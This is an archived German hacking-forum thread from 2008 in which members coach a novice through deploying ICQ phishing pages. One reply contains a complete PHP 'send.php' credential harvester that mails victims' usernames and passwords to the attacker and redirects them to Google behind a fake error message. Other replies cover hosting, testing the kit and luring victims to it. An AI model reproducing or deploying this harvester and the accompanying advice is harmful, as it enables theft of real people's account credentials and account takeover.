PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : FTP server und Phishing???



xXSXx
23.09.2008, 16:19
Hi leute
Ich gleube diese fragen wurden schon mehrmals gestelt aber in der sufu hab ich nichts passendes gefunden also zu meiner frage.
Phishing seiten habe ich mir download jetzt hab ich mir auch einen server auf meinen pc gemacht jetzt wollte ich wissen was ich oder besser gesagt wo hin mit den z.B ICQ Phishing soll und was ich danach machen muss damit ich z.B von ICQ von irgentwem seine daten bekomme ?? :?:


Thx im voraus :wink:

Gumball
23.09.2008, 16:22
Zieh den ganzen Ordner auf den FTP,sind meistens eine index.html/php und eine "send.php" öffne mal die send.php mit dem ordner evtl. musste e-mail ändern , falls es nen mailsend script ist,sonst ist das inordnung so und der log ist nachdem einloggen auf dem server ;)

xXSXx
23.09.2008, 16:27
ok das habe ich gemacht aber ich gleube das es dan auf den server gespeichert wird aber ich wörde gerne es lieber an meine E-mail bekommen geht das ?? und wen Ja wie ?
Thx

mob_action
23.09.2008, 16:41
Weis jemand ob es irgendwo nen tut dazu gibt ?

Freepler
23.09.2008, 16:44
Was verstehst du denn nicht dadran? ô.Ô

Gumball
23.09.2008, 16:47
<?php
$benutzer=$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
if ($pass == "")
{
print("Bitte geben Sie ihr Passwort ein");
}
elseif ($benutzer == "")
{
print("Bitte geben Sie ihren Benutzernamen ein");
}
else
{
$mailtext="Benutzername:";
$mailtext.=$benutzer;
$mailtext.="\n";
$mailtext.="Passwort: ";
$mailtext.=$pass;
$absender="From:";
$absender.="Phish";
mail("deine@mail.net",$benutzer,$mailtext,$absender);

// Ändere deine E-Mail Addresse, wo die Accountdaten hingeschickt werden sollen.
print("Der von ihnen angeforderte Service ist momentan leider nicht verfügbar. Bitte versuchen Sie es später noch einmal.");
}
// Ändere auch <meta http-equiv="Refresh" content="1; url=http://www.google.de"> Ändere einfach die URL zu der die Vic's nach "fehlgeschlagenem" Login geschickt werden sollen.
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=http://wwwgoogle.de">
</body>
</html>

Speicherste einfach aus dem editor heraus:
Dateityp -> Alle Dateitypen , nennste "send.php" oder wie auch immer deine jetztige heisst

xXSXx
23.09.2008, 17:49
Da steht jetzt im Code fast überall benutzer und pass soll ich da auch was schreiben oder nicht. Email hab ich eingetragen

Freepler
23.09.2008, 18:06
Einfach nur bei deine@mail.net deine E-Mail eintragen.
Den Rest lässt du am besten so.

Fear-Fm
23.09.2008, 18:15
Verlinke die ordner ( mit den anderen index.html/.php dateien in dem Root also index.html/.php

xXSXx
23.09.2008, 18:16
erkläre das bitte ein bishen genauer :roll:
sry und wie man das testet

Freepler
23.09.2008, 18:19
Indem du in die Felder irgendeinen Müll schreibst und in deinem EMail-Postfach nachguckst.

Edit:// Eben stand da noch die Frage, wie man sowas testet -.-

xXSXx
23.09.2008, 18:24
also ich habe jetzt die dateien auf mein server gepackt.
und was soll ich jetzt machen wie sollen andere leute dadrauf kommen muss ich was verschicken ?? :roll:

Freepler
23.09.2008, 18:25
Du musst ihnen weismachen, dass es da was tolles gibt.
Sei kreativ!

Fear-Fm
23.09.2008, 18:27
Du musst nun eine index.html/.php schreiben was das ist egal und ich dieser datei verknüpst du einfach die ordner und die index dateien öffnen sich schon selber ich hoffe du hast es jetzt verstanden

xXSXx
23.09.2008, 18:34
also ich habe jetzt die icq Phishing rein gemacht aber wen ich dadrauf gehe und da loggin und pw eintrage kommt da der download von der "php" datei???
und wen ich es richtig verstanden muss ich nur an irgent wen die seite mit dem Phishing send und wen sie was rein schreiben kommt es bei mir an ??
thx

Gumball
23.09.2008, 19:19
Du hast den Sinn vom Phishing schon recht gut verstanden denk ich , aber das mit dem download der send.php , unterstützt dein hoster php ? hast du es ONLINE oder OFFLINE getestet ? offline geht das nicht! Ausser man hat sowas installiert,aber wayne.

xXSXx
23.09.2008, 20:15
also ich habe es online gemacht aber es kann aber daran liegen das ich vielleich Internet Explorer 8 habe weil wen ich es bei Mozillas Firefox mache komme ich nach dem eintragen von loggin und PW zu meiner gewünschten seite was ich angegeben hab (Google.de) aber ich bekomme troz dem keine email ?? warum was hab ich falsch gemacht ??
thx

Gumball
23.09.2008, 20:23
Zeig mir mal den link zu deiner Seite.

Akzeptiert dein Hoster PHP ?

Wenn du es nicht weisst -> Welchen Hoster hast du ?

Thunderstorm
23.09.2008, 20:26
Ich könnte dir mal über ICQ helfen

Mystery RnB
19.10.2008, 23:28
hmm ich check das auch nicht mit zur email versenden xD

habs auch auf server mit log.txt des geht gut :D

auch wenn email schon schön wäre :D